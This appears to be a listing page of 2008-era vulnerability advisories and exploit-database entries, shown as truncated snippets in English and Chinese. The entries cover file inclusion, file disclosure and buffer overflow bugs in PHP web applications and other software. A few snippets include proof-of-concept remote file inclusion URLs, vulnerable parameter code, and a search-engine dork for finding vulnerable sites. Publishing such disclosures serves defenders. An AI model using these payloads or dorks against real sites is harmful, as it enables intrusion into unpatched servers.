twiki-disclose.txt

TWiki 4.2.0 File Disclosure Vuln configure "We're brazilian newbies!!! :p" - Th1nk3r Info ---------------------------------------------------------------------------------------------------------------- Classe : Input Validation Error Remote : Yes Local : No Date : 05/08/2008 Credits : Th1nk3r...

DEBIAN-CVE-2008-3457

Cross-site scripting XSS vulnerability in setup.php in phpMyAdmin before 2.11.8 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted setup arguments. NOTE: this issue can only be exploited in limited scenarios in which the attacker must be able to modify...

Perl rmtree()函数本地不安全权限漏洞

BUGTRAQ ID: 29902 CVECAN ID: CVE-2008-2827 Perl是一种免费且功能强大的编程语言。 Perl的lib/File/Path.pm文件中的rmtree函数在执行chmod时没有正确地检查权限： my $nperm = $perm & 07777 | 0600; if $nperm != $perm and not chmod $nperm, $root if $ForceWriteable error$arg, "cannot make file writeable", $canon;...

fogforum-lfi.txt

======================================================= FOG Forum 0.8.1 Local File Inclusion Vulnerabilities ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team...

Fedora 8 : krb5-1.6.2-14.fc8 (2008-2647)

This update incorporates fixes included in MITKRB5-SA-2008-001 use of uninitialized pointer / double-free in the KDC when v4 compatibility is enabled and MITKRB5-SA-2008-002 incorrect handling of high-numbered descriptors in the RPC library. This update also incorporates less-critical fixes for a...

Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities

No description provided by source. Portail Web Php = 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar POC : I- Remote File Inclusion /PwP2.5.1.1/template/Vert/index.php?sitepath=http://localhost/020.txt...

SLAED CMS 2.5 Lite (newlang) Local File Inclusion Vulnerability

No description provided by source. SLAED CMS 2.5 Lite Local file inclusion Script url http://www.slaed.net/uploads/files/public/SLAEDCMS2.5Lite.zip Lets code in function/sources.php: 780: // Format language 781: function getlang$module="" 782: global $multilingual, $currentlang, $language,...

Xoops XoopsGallery Module 'init_basic.php'远程文件包含漏洞

BUGTRAQ ID: 27155 CNCAN ID:CNCAN-2008010814 Xoops XoopsGallery Module是一款基于PHP的WEB应用程序。 Xoops XoopsGallery Module不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'initbasic.php'脚本对用户提交的'GALLERYBASEDIR'参数缺少过滤，提交远程服务器上的任意文件作为包含对象，可导致以WEB权限执行任意PHP代码。 Xoops XoopsGallery Module 1.3.3 9 ------------...

LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability

No description provided by source. LearnLoop 2.0beta7 sFilePath Remote File Disclosure Vulnerability http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz...

Ubuntu 6.06 LTS / 6.10 / 7.04 : tar vulnerability (USN-506-1)

Dmitry V. Levin discovered that tar did not correctly detect the '..' file path element when unpacking archives. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges. Note that Tenable Network Security...

BackUpWordPress Bkpwp_Plugin_Path远程文件包含漏洞

BackUpWordPress是一款基于PHP的WEB应用程序。 BackUpWordPress不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于脚本对用户提交的'BkpwpPluginPath'参数缺少过滤，指定远程服务器上的任意文件作为包含参数，可导致以WEB权限执行任意PHP代码。 Designpraxis BackUpWordPress 0.4.2b 目前没有详细解决方案提供： http://wordpress.designpraxis.at/plugins/backupwordpress/...

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln

No description provided by source. scWiki 1.0 Beta 2 common.php pathdot Remote File Inclusion Vulnerability http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwikibeta2.zip POC : /includes/common.php?pathdot=Shell sebug.net...

Joomla! Component mp3 allopass 1.0 - Remote File Inclusion

Joomla! Component mp3 allopass 1.0 - Remote File Inclusion commp3allopass joomla component Remote File Include Vulnerability Component : commp3allopass Download file : http://www.joomlaratings.com Dicovered by : NoGe Contact : [email protected]...

Buffer overflow

Buffer overflow in Next Generation Software Virtual DJ VDJ 5.0 allows user-assisted remote attackers to execute arbitrary code via a long file path in an m3u file...

CVE-2007-4734

Buffer overflow in Ots Labs OTSTurntables 1.00 allows user-assisted remote attackers to execute arbitrary code via a long file path in an m3u file...

CVE-2007-4735

CVE-2007-4735 describes a buffer overflow in Next Generation Software’s Virtual DJ (VDJ) 5.0. The vulnerability allows user-assisted remote attackers to execute arbitrary code via a long file path in an M3U playlist. The provided documents identify the affected product and the root cause (buffer ...

SOTEeSKLEP <= 3.5RC9 (file) Remote File Disclosure Vulnerability

No description provided by source. SOTEeSKLEP Remote File Disclosure Vulnerability Script : SOTEeSKLEP Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other. Site : http://www.sote.pl Bug: ... if ! empty$REQUEST"file" $file=$REQUEST'file';...

soteesklep-disclose.txt

SOTEeSKLEP Remote File Disclosure Vulnerability Script : SOTEeSKLEP Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other. Site : http://www.sote.pl Bug: ... if ! empty$REQUEST"file" $file=$REQUEST'file'; ... $filepath="$DOCUMENTROOT/themes/$config-lang/htmlfiles/$file"; if...

SOTEeSKLEP <= 3.5RC9 (file) Remote File Disclosure Vulnerability

Exploit for unknown platform in category web applications ================================================================ SOTEeSKLEP lang/htmlfiles/$file"; if fileexists$filepath $fd=fopen$filepath,"r"; $data=fread$fd,filesize$filepath; print $data; fclose$fd; ... Dork: inurl:"/go/files/?file="...

SOTEeSKLEP 3.5RC9 - &#039;file&#039; Remote File Disclosure

SOTEeSKLEP Remote File Disclosure Vulnerability Script : SOTEeSKLEP Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other. Site : http://www.sote.pl Bug: ... if ! empty$REQUEST"file" $file=$REQUEST'file'; ... $filepath="$DOCUMENTROOT/themes/$config-lang/htmlfiles/$file"; if...